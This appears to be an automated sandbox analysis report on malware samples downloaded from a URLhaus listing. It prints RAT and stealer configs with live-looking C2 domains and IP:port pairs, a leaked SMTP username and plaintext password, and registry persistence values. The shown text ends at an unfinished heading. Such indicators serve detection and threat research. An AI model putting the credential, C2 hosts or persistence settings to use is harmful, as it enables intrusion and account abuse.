Analysis
-
max time kernel
1713s -
max time network
1749s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2022 22:14
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://urlhaus.abuse.ch/browse/tag/exe/
Resource
win10v2004-20220812-en
General
-
Target
https://urlhaus.abuse.ch/browse/tag/exe/
Malware Config
Extracted
C:\Program Files\7-Zip\History.txt
Extracted
Protocol: smtp- Host:
smtp.leonardfood.com - Port:
587 - Username:
karimi@leonardfood.com - Password:
K@rimi95
Extracted
formbook
4.1
8rmt
3472cc.com
takecareyourhair.com
kontolajigasd21.xyz
daihaitrinh.net
syncmostlatestinfo-file.info
lovesolutionsastrologist.info
angelapryan.com
rio727casino.com
jjsgagets.com
devyatkina.online
thegoldenbeautyqatar.com
czytaj-unas24live.monster
timepoachers.com
gayxxxporn.site
72308.xyz
kristanolivo.com
hijrahfwd.com
bmfighters.com
alfamx.website
handfulofbabesbows.com
nationalsocialism.link
mega-recarga-arg.com
rytstack.com
kfav77.xyz
rrexec.net
linetl.top
freedomcleaningusa.com
abofahad3478.tokyo
teamvalvolineeurope.com
kyty4265.com
afrikannaland.info
dharmatradinguae.com
bqylc.buzz
lifeprojectmanager.pro
streeteli.site
68fk.vip
wasemanntrucking.com
auracreitarusblog.com
dfgzyt.cyou
tecnotuto.net
ookkvip.com
247repairs.info
tyvwotnmrlpjgl.biz
courtneymporter.com
gildainterior.com
papiska.xyz
sparrow.run
tyh-group.com
april-zodiac-sign.info
kiaf1.site
cooleyes.live
partasa.com
connecticutinteriors.com
thelovehandles.us
netinseg.website
diaryranch.xyz
serenaderange.com
milano.icu
vapeseasy.com
hengruncosmetics.com
vlashon.com
masberlian.ink
djayadiwangsa.store
nicneni.xyz
ym2668.top
Extracted
warzonerat
baramac.duckdns.org:6269
Extracted
vidar
56
1672
https://t.me/asifrazatg
https://steamcommunity.com/profiles/76561199439929669
-
profile_id
1672
Extracted
formbook
4.1
h3ha
ideas-dulces.store
store1995.store
swuhn.com
ninideal.com
musiqhaus.com
quranchart.com
kszq26.club
lightfx.online
thetickettruth.com
meritloancubk.com
lawnforcement.com
sogeanetwork.com
thedinoexotics.com
kojima-ah.net
gr-myab3z.xyz
platiniuminestor.net
reviewsiske.com
stessil-lifestyle.com
goodqjourney.biz
cirimpianti.com
garsouurber.com
dakshaini.com
dingshuitong.com
pateme.com
diablographic.com
elenesse.com
neginoptical.com
junkremovalbedford.com
dunclearnia.bid
arabicadev.com
thelastsize.com
ku7web.net
chaijiaxia.com
shopnexvn.net
gacorking.asia
missmadddison.com
rigapyk.xyz
chain.place
nosesports.com
paymallmart.info
opi-utp.xyz
institutogdb.com
f819a.site
truefundd.com
producteight.com
quasetudo.store
littlelaughsandgiggles.com
rickhightower.com
urbaniteboffin.com
distributorolinasional.com
bcffji.xyz
wwwbaronhr.com
veridian-ae.com
luxeeventsny.net
freedom-hotline.com
lylaixin.com
mathematicalapologist.com
captivatortees.com
rb-premium.com
nairabet365.com
b2cfaq.com
sunroadrunning.com
centaurusvaccination.com
lamegatienda.online
fucktheenemy.com
Extracted
remcos
MONDAYHost BLESS
aryexpcrt.ddns.net:3216
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-6PETGK
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
remcos
ThirdClients
79.134.225.97:1558
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
appsync.exe
-
copy_folder
Appsync
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
Appsync
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
Appsync-00ARH2
-
screenshot_crypt
false
-
screenshot_flag
true
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Appsync
-
take_screenshot_option
true
-
take_screenshot_time
55
-
take_screenshot_title
mail;webmail;crypto;btc;ethereum;bitcoin;eth;outlook;foxmail;bank;email;compose;
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
DefenderSmartScren
217.64.31.3:8437
DefenderSmartScren
-
delay
3
-
install
false
-
install_file
SecurityHealtheurvice.exe
-
install_folder
%AppData%
Extracted
vidar
56
1364
https://t.me/asifrazatg
https://steamcommunity.com/profiles/76561199439929669
-
profile_id
1364
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\Miriuk\\Miruik.exe," reg.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4552-404-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral1/memory/5444-434-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Formbook payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/3960-141-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/3960-146-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral1/memory/4844-149-0x0000000000F80000-0x0000000000FAF000-memory.dmp formbook behavioral1/memory/4844-152-0x0000000000F80000-0x0000000000FAF000-memory.dmp formbook behavioral1/memory/1848-222-0x0000000000480000-0x00000000004AF000-memory.dmp formbook behavioral1/memory/1848-223-0x0000000000480000-0x00000000004AF000-memory.dmp formbook -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/3476-288-0x0000000000400000-0x0000000000457000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/1532-290-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView behavioral1/memory/1532-293-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 4 IoCs
Processes:
resource yara_rule behavioral1/memory/380-287-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral1/memory/3476-288-0x0000000000400000-0x0000000000457000-memory.dmp Nirsoft behavioral1/memory/1532-290-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/1532-293-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Warzone RAT payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2560-168-0x0000000000400000-0x000000000041D000-memory.dmp warzonerat behavioral1/memory/2560-176-0x0000000000400000-0x000000000041D000-memory.dmp warzonerat -
XMRig Miner payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/5472-396-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5472-397-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5472-398-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5860-414-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/5860-416-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
cmmon32.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run cmmon32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\XN0XN08XG = "C:\\Program Files (x86)\\Gkdv\\yx8pgdl0px.exe" cmmon32.exe -
Blocklisted process makes network request 22 IoCs
Processes:
cmstp.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exerundll32.exerundll32.exeflow pid process 325 4844 cmstp.exe 374 2576 powershell.exe 375 2888 powershell.exe 384 444 powershell.exe 396 4388 powershell.exe 417 3676 powershell.exe 426 5336 powershell.exe 441 5476 powershell.exe 449 5692 powershell.exe 462 6088 powershell.exe 602 724 powershell.exe 670 6140 powershell.exe 739 4844 cmstp.exe 809 5068 powershell.exe 1031 2852 powershell.exe 1052 3096 powershell.exe 1067 5412 powershell.exe 1133 4324 powershell.exe 1149 5228 powershell.exe 1170 3880 powershell.exe 3124 1500 rundll32.exe 3419 2280 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
Processes:
alaat2.1.exeycayuhnew.exeycayuhnew.exemakanaki.exezgoqp.exezgoqp.exevbc.exebuild.exejeymo2.1.exeenqnjvfa.exeenqnjvfa.exevbc(1).exevbc(2).exeMiruik.exenewversion2.exevbc(2).exeRustExternal%u202Enls..scrDEFENDERFILESECURITY.EXE0.exeuQIyezHYEb.exesSHdLPmGvR.exegWp3Y1Z5zl.exeMsLpqg1mkp.exe35JrmltklD.exe4daUBDWNly.exeNOTEPAD.EXEfJLyuMh29f.exez4BWkjnInT.exeRCAHrSufv7.exeUPuzEwySUY.exeJDSG4.exeJDSG3.exe614.exeJDSDS4.exe8.exesvchosts.exePOSA12.exeMNZXHA36.exePOIXCB3.exenorza.exexrfqtvbjh.exexrfqtvbjh.exeBVNMXCGHJ7.exeJDSG3.exeJDSDS4.exe7.exeQHGJASD27.exeLKSJDSAKDQ.exeLKXMNBZX55.exe60E0G7UKRntM1TQ.exeLKXMNX55.exeBVNMXCGHJ7.exeJDSG3.exeJDSDS4.exe60E0G7UKRntM1TQ.exeMiljoeministeren.exe0.exegKHZUfqcLT.exeKTsJHXYseh.exe35JrmltklD.exeEcS04le5nj.exesgq83QQfG4.exeRJPrfsm7fj.exeTdAEHN5fwV.exepid process 2528 alaat2.1.exe 3964 ycayuhnew.exe 3960 ycayuhnew.exe 1372 makanaki.exe 3872 zgoqp.exe 2560 zgoqp.exe 2312 vbc.exe 424 build.exe 2920 jeymo2.1.exe 1748 enqnjvfa.exe 524 enqnjvfa.exe 4892 vbc(1).exe 2172 vbc(2).exe 4836 Miruik.exe 4824 newversion2.exe 3896 vbc(2).exe 3376 RustExternal%u202Enls..scr 1084 DEFENDERFILESECURITY.EXE 1232 0.exe 2716 uQIyezHYEb.exe 1416 sSHdLPmGvR.exe 4192 gWp3Y1Z5zl.exe 3012 MsLpqg1mkp.exe 4904 35JrmltklD.exe 4276 4daUBDWNly.exe 5140 NOTEPAD.EXE 5344 fJLyuMh29f.exe 5788 z4BWkjnInT.exe 5852 RCAHrSufv7.exe 5996 UPuzEwySUY.exe 4660 JDSG4.exe 5852 JDSG3.exe 2464 614.exe 4488 JDSDS4.exe 5836 8.exe 1484 svchosts.exe 4640 POSA12.exe 5008 MNZXHA36.exe 3784 POIXCB3.exe 1936 norza.exe 2988 xrfqtvbjh.exe 3188 xrfqtvbjh.exe 5556 BVNMXCGHJ7.exe 368 JDSG3.exe 2288 JDSDS4.exe 3520 7.exe 5284 QHGJASD27.exe 6072 LKSJDSAKDQ.exe 2664 LKXMNBZX55.exe 5892 60E0G7UKRntM1TQ.exe 5276 LKXMNX55.exe 2992 BVNMXCGHJ7.exe 3448 JDSG3.exe 5784 JDSDS4.exe 3636 60E0G7UKRntM1TQ.exe 4152 Miljoeministeren.exe 1580 0.exe 5560 gKHZUfqcLT.exe 5764 KTsJHXYseh.exe 5212 35JrmltklD.exe 5624 EcS04le5nj.exe 5420 sgq83QQfG4.exe 5996 RJPrfsm7fj.exe 4308 TdAEHN5fwV.exe -
Registers COM server for autorun 1 TTPs 6 IoCs
Processes:
60E0G7UKRntM1TQ.exesetup.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 60E0G7UKRntM1TQ.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 60E0G7UKRntM1TQ.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32 setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ = "\"C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe\"" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\CLSID\{635EFA6F-08D6-4EC9-BD14-8A0FDE975159}\LocalServer32\ServerExecutable = "C:\\Users\\Admin\\AppData\\Local\\Chromnius\\Application\\109.0.5386.0\\notification_helper.exe" setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 60E0G7UKRntM1TQ.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE upx C:\Users\Admin\AppData\Roaming\DEFENDERFILESECURITY.EXE upx behavioral1/memory/1084-308-0x00007FF618CA0000-0x00007FF618DFF000-memory.dmp upx behavioral1/memory/1084-311-0x00007FF618CA0000-0x00007FF618DFF000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\0.exe upx C:\Users\Admin\AppData\Local\Temp\0.exe upx behavioral1/memory/1232-315-0x00007FF7BCCB0000-0x00007FF7BCE13000-memory.dmp upx -
Checks computer location settings 2 TTPs 35 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4daUBDWNly.exefJLyuMh29f.exesSHdLPmGvR.exetord.exez4BWkjnInT.exeUPuzEwySUY.exegntuud.exevbc(2).exeoVvR0Kg0to.exeIAWbmRKnNw.exechromnius.exe35JrmltklD.exegKHZUfqcLT.exeRJPrfsm7fj.exeyoMEITfbTK.exelinda5.exechromnius.exe60E0G7UKRntM1TQ.exeRegAsm.exeRCAHrSufv7.exezmmP77vsYU.exechromnius.exechromnius.exenewversion2.exebuild.exegWp3Y1Z5zl.exeMsLpqg1mkp.exeKTsJHXYseh.exe35JrmltklD.exeEcS04le5nj.exesgq83QQfG4.exeTdAEHN5fwV.exeuQIyezHYEb.exechromnius.exefile.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 4daUBDWNly.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation fJLyuMh29f.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation sSHdLPmGvR.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation tord.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation z4BWkjnInT.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation UPuzEwySUY.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation gntuud.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation vbc(2).exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation oVvR0Kg0to.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation IAWbmRKnNw.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation chromnius.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 35JrmltklD.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation gKHZUfqcLT.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation RJPrfsm7fj.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation yoMEITfbTK.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation linda5.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation chromnius.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 60E0G7UKRntM1TQ.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation RCAHrSufv7.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation zmmP77vsYU.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation chromnius.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation chromnius.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation newversion2.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation build.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation gWp3Y1Z5zl.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation MsLpqg1mkp.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation KTsJHXYseh.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 35JrmltklD.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation EcS04le5nj.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation sgq83QQfG4.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation TdAEHN5fwV.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation uQIyezHYEb.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation chromnius.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation file.exe -
Loads dropped DLL 64 IoCs
Processes:
build.exeInstallUtil.exeMiljoeministeren.exepid process 424 build.exe 424 build.exe 5136 InstallUtil.exe 5136 InstallUtil.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe 4152 Miljoeministeren.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook accounts 1 TTPs 6 IoCs
Processes:
60E0G7UKRntM1TQ.exe60E0G7UKRntM1TQ.exeAddInProcess32.exe60E0G7UKRntM1TQ.exe60E0G7UKRntM1TQ.exe60E0G7UKRntM1TQ.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 60E0G7UKRntM1TQ.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 60E0G7UKRntM1TQ.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts AddInProcess32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 60E0G7UKRntM1TQ.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 60E0G7UKRntM1TQ.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts 60E0G7UKRntM1TQ.exe -
Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
Processes:
rundll32.exeRegsvcs.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook rundll32.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Regsvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Regsvcs.exe Key opened \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Regsvcs.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 14 IoCs
Processes:
gntuud.exezgoqp.exexrfqtvbjh.exepowershell.execmstp.exe614.exepowershell.exe7.exepowershell.exesvchosts.exePOIXCB3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CRYPTED_BSI20221205.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000026001\\CRYPTED_BSI20221205.exe" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\osoudspt = "C:\\Users\\Admin\\AppData\\Roaming\\tdvtqndxxhl\\kiflb.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\zgoqp.exe\" C:\\Users\\Admin\\AppData\\Local\\Te" zgoqp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\oivwlrhyk = "C:\\Users\\Admin\\AppData\\Roaming\\hprllbdymxpxuh\\cbsfkgnxd.exe \"C:\\Users\\Admin\\AppData\\Local\\Temp\\xrfqtvbjh.exe\" C:\\Users\\Admin\\AppDa" xrfqtvbjh.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsFilerar = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsFilerar\\WindowsFilerar.exe" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\A46HZLVHFTS4 = "C:\\Program Files (x86)\\Ssnrt\\7no04fld0or5.exe" cmstp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wish.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000028001\\wish.exe" gntuud.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhosts = "\"C:\\Users\\Admin\\Downloads\\614.exe\"" 614.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pigalicapi = "C:\\Users\\Admin\\pigalicapi.exe" 7.exe Key created \Registry\Machine\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run cmstp.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhosts = "\"C:\\Users\\Admin\\AppData\\Roaming\\subdir\\svchosts.exe\"" svchosts.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" POIXCB3.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\linda5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000027001\\linda5.exe" gntuud.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 393 ip-api.com -
Drops file in System32 directory 1 IoCs
Processes:
Miljoeministeren.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Unmetallic.ini Miljoeministeren.exe -
Suspicious use of SetThreadContext 64 IoCs
Processes:
